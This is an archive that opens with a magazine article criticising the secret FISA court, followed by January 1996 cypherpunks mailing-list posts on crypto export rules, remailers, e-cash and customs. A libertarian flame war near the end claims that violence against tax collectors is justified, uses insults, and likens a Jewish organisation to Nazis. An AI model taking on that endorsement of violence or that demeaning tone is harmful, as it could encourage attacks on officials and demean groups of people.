 CAQ,  1500 Massachusetts Ave. #732 ,  Washington, DC 20005, USA 
 
Phone: 202-331-9763 / Fax: 202-331-9751 / E-mail: caq@igc.apc.org
=================================================================
THE SECRET FISA COURT: RUBBER STAMPING ON RIGHTS
by Philip Colangelo

Part 1 of 3

SEVEN JUDGES ON A SECRET COURT HAVE AUTHORIZED ALL BUT ONE OF OVER
7,500 REQUESTS TO SPY IN THE NAME OF NATIONAL SECURITY. THEY MEET
IN SECRET, WITH NO PUBLISHED ORDERS, OPINIONS, OR PUBLIC RECORD.
THOSE SPIED ON MAY NEVER KNOW OF THE INTRUSION. NOW, CLINTON HAS
EXPANDED THE POWERS TO INCLUDE NOT ONLY ELECTRONIC, BUT PHYSICAL
SEARCHES.

The aftershock of the Oklahoma City bombing sent Congress scurrying
to trade off civil liberties for an illusion of public safety. A
good ten weeks before that terrible attack, however   with a barely
noticed pen stroke President Bill Clinton virtually killed off the
Fourth Amendment when he approved a law to expand the already
extraordinary powers of the  strangest creation in the history of
the federal judiciary.  *2 

Since its founding in 1978, a secret court created by the Foreign
Intelligence Surveillance Act (FISA rhymes with  ice -a) has
received 7,539 applications to authorize electronic surveillance
within the U.S. In the name of national security, the court has
approved all but one of these requests from the Justice Department
on behalf of the Federal Bureau of Investigation and the National
Security Agency. *3 Each of these decisions was reached in secret,
with no published orders, opinions, or public record. The people,
organizations, or embassies spied on were not notified of either
the hearing or the surveillance itself. The American Civil
Liberties Union was not able to unearth a single instance in which
the target of a FISA wiretap was allowed to review the initial
application. Nor would the targets be offered any opportunity to
see transcripts of the conversations taped by the government and
explain their side of the story.  Without access to such materials, 
said Kate Martin of the ACLU,  targets of FISA searches are denied
any meaningful opportunity to contest the basis for the execution
of  the FISA search.  *4
========================================
OPEN-ENDED SURVEILLANCE
When Clinton signed Executive Order 12949 on February 9, the
frightening mandate of the FISA, court was greatly expanded: It now
has legal authority to approve black-bag operations   to authorize
Department of Justice (DoJ) requests to conduct physical as well
as electronic searches, without obtaining a warrant in open court,
without notifying the subject, without providing an inventory of
items seized. The targets need not be under suspicion of committing
a crime, but may be investigated when  probable cause  results
solely from their associations or status: for example, belonging
to, or aiding and abetting organizations deemed to pose a threat
to U.S. national security. Furthermore, despite a lowered standard
for applying the Fourth Amendment against unreasonable search and
seizure than is necessary in other U.S. courts,5 under the 1995
expansion, evidence gathered by the FISA court may now be used in
criminal trials. Previously, evidence was collected and stockpiled
solely for intelligence purposes.
==========================================================
LEGALIZING THE AMES SEARCH 

Granting new powers to the FISA court was accomplished quietly and
treated as a non-event in the national media. The lack of reporting
was somehow fitting, though, following as it did the silent  debate 
last year when Congress rubberstamped the annual Intelligence
Authorization Act. *6 

Some legal minds found the whole exercise
positively refreshing.   The fact that this was done with a minimum
of fuss and posturing on both sides, and without having to have a
debate that tries to roll up the corners of classified information
is very impressive,  cheered former NSA General Counsel Stewart
Baker. *7
 
Reportedly, the Clinton administration had not always been
enthusiastic about expanding the court's powers. Like its
predecessors, it operated under the assumption that the executive
already had  inherent authority  to exempt itself from Fourth
Amendment constraints and could order warrantless searches to
protect national security. Nonetheless, the government avoided
allowing this  inherent authority  to be tested in the courts. *8 
Then along came Aldrich Ames. The spy case proved a convenient
vehicle on which to hitch expansion of state power. It also offered
a glimpse at the state-of-the-art domestic counterintelligence
techniques that might well be turned on an activist group near you.


Following months of electronic and physical surveillance   which 
included a break-in of Ames' car and searches through his office
and family trash   FBI agents were finally turned loose in the
early morning hours of October 9, 1993.  They didn't `pick' locks
like in the movies; they made their own keys. Among other agents
in the FBI, the consensus was unanimous: The tech agents were
geniuses.  *9 

 Thanks to a warrant authorized by Attorney General Janet Reno, 
a team of agents from the  sprawling  National Security Division 
had permission to enter the Ames home  in Arlington, Va.10

There was only one minor problem.  The attorney general of the
United States does not have the authority to order a warrantless
physical search of a citizen's home,  argued Professor Jonathan
Turley of George Washington University National Law Center.  The
Aldrich Ames search in my view was obviously and egregiously
unconstitutional. 11

Other civil liberties lawyers agree with this evaluation, and the
Justice Department itself was concerned enough about the question
to refer to this problem when it negotiated a deal with Ames in
order to avoid trial. While Ames was sentenced to life in prison,
his wife Rosario received five years.  We didn't get to the point
of litigation, I regret to say,  said Ames' lawyer Plato Cacheris. 
The problem was that Ames very much wanted to see that his wife was
treated a little more softly than he was being treated.  *12

Now eager to put a stamp of judicial impartiality on the hazy
executive branch doctrine of  inherent authority,  the Justice
Department immediately got behind the bill to expand the FISA
court's power. Soon after Ames pleaded guilty last year to spying,
administration officials began arguing that adherence to
traditional Fourth Amendment protections for American citizens
would  unduly frustrate  counterintelligence efforts against spies
operating in the U.S.13  Physical searches to gather foreign
intelligence depend on secrecy,  argued Deputy Attorney General
Jamie Gorelick.  If the existence of these searches were known to
the foreign power targets, they would alter their activities to
render the information useless. 14 Gorelick went on to explain that 
A [traditional] search can only be made when there's probable cause
to believe a crime is involved, whereas  a national-security search
can be made at a substantially earlier stage. We often don't know
what we're looking for when we go in,  she observed.15 
======================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jan 1996 14:59:53 +0800
To: cypherpunks@toad.com
Subject: Re: Fwd: Scrambled software gets an OK
Message-ID: <199601150642.WAA16107@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:30 AM 1/13/96 -0800, thad@hammerhead.com (Thaddeus J. Beier) wrote:
>Scrambled software gets an OK
>
>-- Exports: Foreign encoding unfair to U.S. firms, Commerce Department says.
>
>Bloomberg Business News
>
>WASHINGTON -- The Commerce Department will recommend easing export controls
>on encryption software after a study by the department and the National
>Security Agency found the restrictions are hurting U.S. firms, Commerce
>Secretary Ron Brown said.

We discussed this a bit at the Bay Area cpunks meeting yesterday.
It'd be fun to know the politics involved and what we'll get out of this,
but "easing export controls" could be anything from "dropping the limits
on anything but designed-for-the-military crypto" to "64 bits with escrow".
And, of course, "we'll release a policy statement in a few months" isn't
highly informative either.  On the other hand, it's an invitation for lobbying
and public comment, so we might as well take advantage of it.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 15 Jan 1996 14:57:32 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Zimmermann case is dropped.
Message-ID: <199601150642.WAA16157@ix13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:22 AM 1/12/96 -0600, Alex Strasheim <cp@proust.suba.com> wrote:
>We need a large sponser who is willing to run a more ambitious crypto
>archive.  If an institution like MIT hosted a more generalized site where
>people could distribute code, it would go a long way towards thawing out
>the chill the government's managed to create by harassing PRZ. 

Oxford University, University of Milan, and Finnish University Network
not big enough for you?  I usually get my PGP code from Oxford.
Now, if MIT were willing to distribute other code from their server,
it would make it easier for people to put their names on their postings,
which would be a Good Thing, without the need for posting to sci.crypt
with Distribution: usa or anonymously remailing encrypted copies or whatever.
#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "Eternal vigilance is the price of liberty" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Mon, 15 Jan 1996 15:34:00 +0800
To: don@cs.byu.edu
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <199601150454.VAA00449@wero.cs.byu.edu>
Message-ID: <30F9FEF0.6EAA@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Don wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> > I've removed the code that uses the e-mail address as the
> > FTP password for anonymous FTPs.
> 
> Does that mean that general-purpose ftp won't be accepted unless the
> user gives up their email? Greaaaaaaat... Can't have it both ways, I
> guess. What can be added as far as user control; inline vs non-inline,
> for example.

  I'm not sure I understand what you are saying, so I will try to
re-state what we are doing.  By default for anonymous FTP we will
send the string "mozilla@" for the anon password.  This is similar
to Mosaic and Internet Explorer, which send "webuser@".  If the
user wants to send their real address, or anything else, they can
type an ftp URL that will allow them to enter the password.  I hope
to add an option so that the user can decide for themselves to send
or not send their identity.  Note that we do not currently send the HTTP
'From:' header.  Some users would like an option to turn it on.

> The FTP explanation certainly explains why my personal system is able
> to confuse the username part of it. And I know there's nothing anyone
> can do about the reverse-ip, but what about http referral field? Will
> there be a way to turn off (blank, actually) this field?

  I would like to add a way to turn it off, but it won't happen in 2.0.

> Jeff, your efforts are certainly appreciated - your ability to get these
> things done is most valuable.

  Thanks.  I just wish I had been able to attend yesterdays cypherpunk
gathering rather than having to fix this bug.  Sigh.

> Regarding the anonymizer:
> First, are there any working anonymizers yet?
> Second, is there any ISP that would be willing to give a home to the
>   anonymizer?

  I think that there are several.  The one at CMU can be reached
at http://anonymizer.cs.cmu.edu:8080/open.html.  I thought that
Sameer had one at c2.org, but a quick look at his web site didn't
turn up anything.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 15 Jan 1996 15:32:54 +0800
To: cypherpunks@toad.com
Subject: An E-Cash service I would like to see
Message-ID: <2.2.32.19960115072214.00863674@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


After looking at the E-Cash site and all of the things to sign, the forms to
fill and the like, I had an idea for a needed service.

What is needed is a method to make e-cash more like how someone would
purchace a money order.  If the Mark Twain bank pitched their services to
places that sold money orders, then you could exchange cash for e-cash with
assured anonymity.  A small fee could be charged (like it is with money
orders) and everyone would be happy.

It would at least introduce alot more people to e-cash...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
              http://www.teleport.com/~alano/ 
       "Is the operating system half NT or half full?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Mon, 15 Jan 1996 13:38:30 +0800
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
Message-ID: <v01520c02ad1f92382586@[199.227.1.218]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bear with me - original text follows all these quotes

At 2:29 PM1/13/96, bryce wrote:
>> If "digital postage" is ever implemented, this sort of
>> distributed-origin mailbomb-through-a-remailer would be stopped
>> immediately.  All the messages that the horny net geeks send would
>> necessarily contain the same postage stamp, and the remailer would
>> notice this right away -- and throw away messages containing the used
>> postage stamp.
>>
>> One more motivation for e$-like digital postage for remailers.
>
>
>Unfortunately this is not the case.  The perpetrator would
>simply have to convince the horny net geeks to pay their own
>postage.  In fact, it is *in general* impossible to have both
>anonymity and prevention/control of mail-bombing.  Of course
>digital postage will help the problem somewhat by making the
>bombers pay for it, and smarter filters on the recipient's end
>will help, but in general it is a problem we are going to have
>to live with if we want anonymity.

Impossible is an awfully strong word.

If I was going to implement free digital stamps, I'd have a autoreply
daemon (stamps@remailer.com) that when sent a mail, would respond with X
number of valid stamps.  If you're going to trust me not to log my remailer
traffic, extending that trust to believing I won't log the stamp requests
shouldn't be that much of a stretch.

Alternatively, the stamp could consist of a unique-id, any unique-id,
working identically to Usenet message ids.  That way, the user can generate
his own stamps without being forced to trust the remailer operator not to
log them.

I prefer the second option as it has both greater anonymity and allows for
simple history file patching to the remailer.

Either way, if the stamps/message-ids are forced to be inside the encrypted
address block, mail-bombers can only get one message through.  Even if the
HNGs are instructed to add a stamp and re-encrypt the address block, when
the spam-o-grams start getting routed through the pre-packaged route,
they'll be stopped dead after one message gets through.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMPnluAF0VTodVW1dAQHilAgAmuvKLut8tR2uHuUkNTMEaYqYK+OR97W0
Wp9ZCNWSZl2pMNyHwmNPUk8L5x7O3OlbTXYMFd+oHAGavL199qCELij/QecBaT5U
L+Nmm86KYvFuVgxvEGcRSZCY8UjQ3nuW7rQ8js9s1I2+uuDgge14qzMajTUYlh2i
nI2ZlffJCv1OC3i5RIPrT6/piC0tAD7pBbFuZD5X3lk8bk90F3MgMiJJP26MPgZ3
23qjaaXLFM0JhnK+1p+7+gd97dh6D6G17OIRhu+9/XJbmR1Vz3sEHt77Xk1jFzYO
tFS5c9k4xXT+DlY6TdOvXPlE5T5KvzHVkV8mJm3VJy/8aFpL/IlthQ==
=faLt
-----END PGP SIGNATURE-----

No man's life, liberty or property are safe while the legislature is in session.

2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 15 Jan 1996 08:34:39 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION...
Message-ID: <199601150023.BAA10721@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Mike Duvos:

> Congratulations.  You win the award for this weeks longest run-on
> sentence. 

   And you win this week's ward for best diversionary grammar lesson.
   I know the difference between *actual* genocide (like, the kind a bunch
of my family members died in) and what the SWC does. Is that a grammatical
question?

> Is there some special reason you had to post this little history
> lesson anonymously?

   Is there any reason I should have done otherwise? I don't especialy
*want* a reputation, good or bad, on this list - but that doesn't have
anything to do with whether I want to or should *say* something. Tell me:
Why do *you* want a name attached to my history lesson?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Mon, 15 Jan 1996 11:02:03 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: No Subject
Message-ID: <702E77E5>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

I believe that ViaCrypt still has one available, altho it is not very
popular.

Peacd

---
 NOTICE: This message originally included graphics and/or sounds which
can only be received by AT&T PersonaLink(sm) subscribers. You received
only the text portion(s) of the message.  Please contact the sender for
information that was deleted. To learn how to send and receive
graphics, voice and text messages via AT&T PersonaLink Services, call
1-800-936-LINK.  

----------------
Received: by attpls.net with Magicmail;13 Jan 96 22:11:45 UT
Date: 15 Jan 96 02:46:57 UT
Sender: owner-cypherpunks@toad.com (owner-cypherpunks)
From: owner-cypherpunks@toad.com (owner-cypherpunks)
Subject: RSA accellerators on ISA/PCI cards?
To: cypherpunks@toad.com (Cypherpunks)
Message-Id: <Pine.SOL.3.91.960113125755.22437B-100000@chivalry>
X-X-SENDER: ses@chivalry

Does anybody have any recommendations for a good RSA accellerator 
available on an ISA/PCI card? I'm looking for something that can be
used 
with numerous public/private keys, though the ability to have one 
tamperproof key would be a bonus.

Thanks
Simon
----
(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))


----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 15 Jan 1996 15:59:07 +0800
To: cypherpunks@toad.com
Subject: Re: COMMUNITY CONNEXION...
In-Reply-To: <199601141734.SAA23618@utopia.hacktic.nl>
Message-ID: <Pine.BSD.3.91.960115073618.27043B-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jan 1996, Anonymous wrote:

> Attila sez:
> 
> >         the SWC is a prime example of very narrow view which is trying to 
> >     "control" what we can say --unfortunately, SWC is guilty of the same
> >     mind-control tactics as the core Nazi party which persecuted them  ==
> >     a very poor example.  In Germany, trading on collective guilt they 
> >     will never stop feeding, they have effectively controlled the issue
> >     so that _any_ speech or revision against their agenda is a hate crime,
> >     and therefore a serious felony. 
> 
>    Sounds like you're a little weak on your history, Attila. Not that I
> agree with the SWC's policies one bit, but some basic dates and facts -
> when SW was born, when he founded his C, when WW2 was, what the Nazis did
> during it and what the SWC has done since, when and how the anti-Nazi and
> hate speech laws were passed in Germany, whether "any" speech or revision
> against the SWC's agenda (or do you just mean "JEWS"?), etc - would make
> pretty short work of your nonsense.
> 

	oh, I do not think so --I would answer you in private mail if you 
    were not afraid to state a Reply-To address.  history is a 
    fascinating study in continual revisionism --to the victor goes the 
    right to rewrite history, or:

	I do not fear history, I intend to write it.
		--Winston Churchill

    	I could have stated my position much clearer: this particular demand
    is based on the same hysteria as has been found throughout history;
    and, see my other comments elsewhere. 

    As to anonyminity, I remain,

	attila == Herr Doktor Professor Daniel Fluekiger

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 15 Jan 1996 16:39:32 +0800
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Phil Z getting through customs
In-Reply-To: <199601121612.IAA06275@montana.nwlink.com>
Message-ID: <Pine.BSD.3.91.960115081539.27043E-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


    answer the questions truthfully and they can not detain you???

	yeah, that's what it says.  BS.  ask any of us who have been 
    detained by the zealots.  I was detained 36 hours at LA, 18 at 
    Dulles, etc.  If you've made the list, you've made the list, and a 
    custom's inspector with a bug up his ass is a nasty person. 

	Rule 1:	 smile regardless of the adversity
	Rule 2:	 other than the three questions on the form, say nothing
	Rule 3:  never use LA or Dulles -pick an airport with humans.

	well, I guess I had better admit it; the travelling public got 
    their money's worth in LA. after customs had shredded and Xray'd
    everything and I was tired, very tired after the long one from New
    Delhi to LA, I was hostile enough to humiliate them sufficiently to
    close all nearby lines --then I mooned them. TS and the red mask can 
    be a wonderful excuse!  I guess I just havent learned --and I was over
    50!  Dulles was previous history....  oh, yeah, they have not bugged 
    me for some time.

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George Banky" <GPB@goofy.ee.swin.oz.au>
Date: Mon, 15 Jan 1996 07:49:16 +0800
To: cypherpunks@toad.com
Subject: Membership of list
Message-ID: <MAILQUEUE-101.960115103035.256@goofy.ee.swin.oz.au>
MIME-Version: 1.0
Content-Type: text/plain


Please advise on how I can join.

Reagards,

e-mail: gpb@goofy.swin.edu.au




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Tue, 16 Jan 1996 11:44:35 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Eggs at Customs
Message-ID: <199601152213.OAA19487@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> Me: "Yes, I have green eggs, and ham, too. The eggs in Paris are especially
> fresh this time of year."

I would like to announce that from all of the mail I've received 
about the egg question, Tim receives the special award for the best 
answer.

I would like to say though that at the time I was in Ottawa, it was 
right during the Quebec Referendum vote.  Making a joke about the 
French (i.e. Parisian eggs) could have stuck me in a little room with 
a customs officer for much, much longer.  Who knows, maybe I was a 
French Canadian spy!!!

hmmmm....

Brad




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 16 Jan 1996 11:43:16 +0800
To: cypherpunks@toad.com
Subject: Re: New Puzzle Palace? Re: CAQ - Secret ...
In-Reply-To: <9601151840.AA00925@w20-575-119.MIT.EDU>
Message-ID: <R0iRHD44w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


grimm@MIT.EDU writes:
> Schneier has done a major rewrite, or at least included *lots* of new
> info.  I haven't gotten a copy yet, but I saw one, and it was twice as
> thick as the first version.
>
> Now I just need the money to buy the book...

I think I paid $40 for the first edition.  I wish I could trade it in
for a discount. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 16 Jan 1996 12:55:21 +0800
To: s1018954@aix2.uottawa.ca
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <Pine.3.89.9601132350.A15455-0100000@aix2.uottawa.ca>
Message-ID: <199601152213.RAA19247@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


s1018954@aix2.uottawa.ca writes:
>My apologies for responding to a political post.
>
>On Sat, 13 Jan 1996, Charlie Merritt wrote:
>
>> I feel that public exposure
>> is enough to put fear into these anonymous government employees.
>> You will note that when they get the mad_bomber
>> some FBI guy jumps right up and takes credit, live, on TV.
>> But when the Air Force orders a $300 toilet seat NO ONE is credited.
>
>It's interesting how we advocate anonymity for ourselves but not for our
>opponents. Feeling righteous?

I agree with Charlie.  These government employees claim to be working
for the american taxpayers, of which group I am a member.  Government
agents must, therefore, expect to be accountable to the citizens, while
accountability in the other direction is virtually the definition of
tyranny.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 16 Jan 1996 14:34:49 +0800
To: gbe@primenet.com (Gary Edstrom)
Subject: Re: Novell & Microsoft Settle Largest BBS Piracy Case Ever
In-Reply-To: <30fac193.340341789@mailhost.primenet.com>
Message-ID: <199601152123.QAA28777@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Gary Edstrom writes:
> I saw this in a news summary today and thought that it might be of
> interest to the list.  Sorry, but this is all of the article that I
> have.

Repeat after me:

This is not software piracy punks. This is CYPHERpunks. We talk about
cryptography and its implications on society. Software piracy isn't a
topic around here.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jan 1996 16:52:09 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Respect for privacy != Re: exposure=deterence?
Message-ID: <m0tc1KD-000918C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 AM 1/15/96 -0800, Rich Graves wrote:
>On Sun, 14 Jan 1996, jim bell wrote:
Richard Graves wrote:

>However, you won't consider looking at a dissenting FAQ.

Aha! Now you identify it as a "dissenting FAQ"!  Let's play a little game.  
Let's say, for purposes of the argument, that there are people who are 
"pro-libertarian," "neutral", and "anti-libertarian."  I know plenty of 
people who hardly even know what libertarianism is about, but in fact are 
more-or-less libertarian in philosophy.  Let's call these people "neutral."  
But in general, people who identify themselves as "dissenters" from 
libertarianism (claiming they know what it is, and assuming for the purposes
of the argument that they are correct about this knowledge) are fucking
statists. 

Somehow, I think I've got you pegged correctly.


>> "Proposition 187"?  Isn't that from CALIFORNIA, not Pennsylvania?  Your
>> commentary is very confusing.
>
>Sorry, an old irrelevant battle.

Then don't confuse people with things like that!


>There was quite a row between Californian "libertarians" and
>non-Californian "libertarians" about Prop 187, with those in California
>saying that the illegal people were STEALING MONEY, and those outside the
>state, including Reason Magazine, saying it was hypocritical at best to
>use government force to deny freedom of movement, especially when neutral 
>studies showed that the illegal people were a net plus for society. In
>effect, Reason Magazine was calling them selfish.

You miss the point.  (this is probably congenital.)

There is a generic problem with "asking a libertarian his position on an
issue."  See, the question assumes how much of an opinion you want, and what
assumptions you're making.  

I'll try to formulate a relevant analogy:  Suppose  you're building a new
house, you have your plans, I'm your friend, and you ask me over for an
opinion on how it ought to be done.  On the one hand, my advice might simply
be to "change the color of the paint."   Or, I could say something more
detailed, like, "you should add another floor."  Or, finally, I could say,
"I don't think you should be building a house THERE, in that low area
subject to flooding, you should build it 10 feet higher, 100 yards away."
Finally, I could say, "No, I don't think you should build that house AT ALL."

Each of these is a form of advice.  The difference is the scope of the
advice.  __YOU__ may only have wanted me to advise you on the color of the
paint.  My advice was to change EVERYTHING.  Both may be quite valid and
correct opinions.

A third party, observing the discussion, would think that there was some
sort of contradiction going on, when in reality (remember reality?!?) it is
simply a matter of scope being determined.


Now, proposition 187, as I _vaguely_ recall, deals with immigrants,
primarily illegal immigrants, and the services a community provides them.
So if you ask a libertarian, "what should we do," there are a number of
separate and distinct types of advise he could give you, depending on the
scope of the question.

On the one hand, the natural response of an unrestrained libertarian is to
say, "There should be no borders, no governments, no taxes, and no welfare,
as well as no public schools, etc."   And that would be correct, as far as
it went.

If you responded to that libertarian, "Uh, sorry, we're not interested in
changing EVERYTHING; we're just asking you to decide whether or not we
should get public services (paid for by tax dollars stolen from citizens by
government) to people who got into the country in violation of the law,"
then he might provide a more limited form of advice based on this
restrictive set of parameters.  

The important thing to remember, however, is that exactly which kind of
advice he gives may be entirely dependent on how restrictive the set of
parameters you've insisted that he follow.  An intelligent libertarian could
give a good and valid piece of advise, with the proviso that since he's
being restricted in the scope of his advice, it will not necessarily be a
"completely libertarian" position.  This should be ASSUMED.

Which means that you could ask essentially the same question of two
different libertarians, and by subtle manipulation of the parameters, get
what might otherwise appear to be two contradictory opinions, depending on
how much latitude each is given in his advice.

>Obviously, I was on the right side.

Obviously, you always THINK you are on the right side.

>
>> >Where, exactly, do you get off disparaging my political philosophy, with 
>> >which you are completely unfamiliar?
>> > 
>> >> >See the non-libertarian
>> >> >FAQ, at http://world.std.com/~mhuben/libindex.html
>> >> 
>> >> Sounds like it would be extraordinarily un-interesting.  
>> >
>> >Good to see you're as open-minded as I thought.
>> 
>> Well, you called it, and I quote, a "non-libertarian FAQ."   Well, I know
>> what a "libertarian FAQ" would generally contain, information to teach the
>> uninformed about libertarianism. These FAQs are generally prepared by
>> libertarians, and are often (usually?) intended to convince people to
>> support the libertarian cause.
>> 
>> But what, pray tell, is a "non-libertarian FAQ"?
>
>Information to teach the uninformed about libertarianism.

Then you should have called it a "FAQ _for_ pre-libertarians."   Or a "FAQ
for those not yet informed about libertarianism."  

But in fact, since above you called it a "dissenting FAQ," more likely, "a
FAQ intended to dissuade people from being (or thinking) in a libertarian
manner."  Far more informative.  Which is why I said that I would consider
it to be extraordinarily UN-interesting.

>> And thus, as I said, I think that would be extraordinarily un-interesting.
>> I've heard PLENTY of idiots try to debunk libertarian philosophy, the vast
>> majority of which know so little about it as to make their attempt not only
>> totally ineffective, but also counter-productive to their intention.
>
>How many is plenty?

In 4 years on FIDOnet?  Dozens.


>> >I see no sequitur here. Where have I excused anyone's actions? I was
>> >talking about ethics, justifiable force,
>> 
>> Libertarians have a principle called "Non-initiation of Force/Fraud." (or
>> "Non-Agression principle.")  Anyone who collects taxes has AUTOMATICALLY
>> initated agression.  Violence against him is not a violation of any
>> libertarian principle.
>
>Libertarians have a practice of USING CAPITAL LETTERS and RIDICULOUS JESSE
>JACKSON-ESQUE RHETORIC to define anything they DISAGREE WITH as VIOLENCE
>AND FRAUD, a non-falsifiable approach that leads to ludicrous conclusions.

And you appear to be a fucking statist.

>> > and probable cause. If you have
>> >probable cause that Watergate or Whitewater has occurred, then further
>> >investigation is justified. If you don't, then the customary financial
>> >disclosure statements should do. 
>> 
>> You're hiding behind the rules of the GOVERNMENT.  Rules written for the
>> benefit of GOVERNMENT people.  Violations of law by GOVERNMENT people are
>> hardly ever prosecuted; Rodney King's assaulters were prosecuted only
>> because somebody JUST HAPPENED to have a camcorder on at "just the right
>> time."
>
>> >Eternal vigilance is the price of liberty, but that doesn't mean you need 
>> >to spy on everybody.
>> 
>> When my system is in place, we won't have to worry about that ever again.
>...
>> >No matter what rhetoric you use, it is not nice to respond to a tax
>> ----------------------------------------^^^^^^^^
>> 
>> >collector COMING TO STEAL YOUR MONEY by invading his privacy. 
>> 
>> Huh?  You're crazier than I thought!  You would deny even the principle of
>> self-defense!  You're truly crazy; you're just about as far as you can
>> possibly get from being a libertarian.  No wonder you had so many questions
>> above!   "Nice" has NOTHING to do with it!
>
>A restaurant denying you a free lunch is the initiation of violence.

Do you really believe this, or were you merely trying to misuse this as a
contrary (though extremely weak) example?


> If 
>you try to skip a debt

What kind of "debt"?  One that you agree to?!?

> and your creditor finds you, are you then 
>justified by the principle of self-defense to kill him? After all, if he 
>pulls a gun on you first, he's the one initiating violence.

Your misunderstanding of libertarianism exceeds only your misunderstanding
of simple logic.

>Measured response and justifiable force. Contracts and justice. When your
>kid misbehaves, you spank them. When someone cuts you off on the freeway,
>you flip them off. When you disagree with someone, you are supposed to
>construct a logical counterargument. When someone insults you, you insult
>them back. When someone pulls a gun on you, you blow their head off. 
>
>Nobody's "stealing" "your" money. The IRS is enforcing a contract.

I've signed no such "contract."  I agreed to no such contract.  I'm AWARE of 
no such contract.  The "contract" or "social contract" argument is debunked 
repeatedly in the various libertarian-oriented political echoes.  Actually, 
it's debunked in non- (not to be confused with "anti-") libertarian echoes 
too, because even if you ignore all the people who don't yet claim 
themselves to be libertarians, the rest of the public can't agree on exactly 
what this "contract" really says.

The "social contract" of a liberal contradicts the "social contract" of the
conservative.  The "social contract" of a Republican contradicts the "social
contract" of a Democrat.

Even if you take a generous position and say that we owe taxes, it has been 
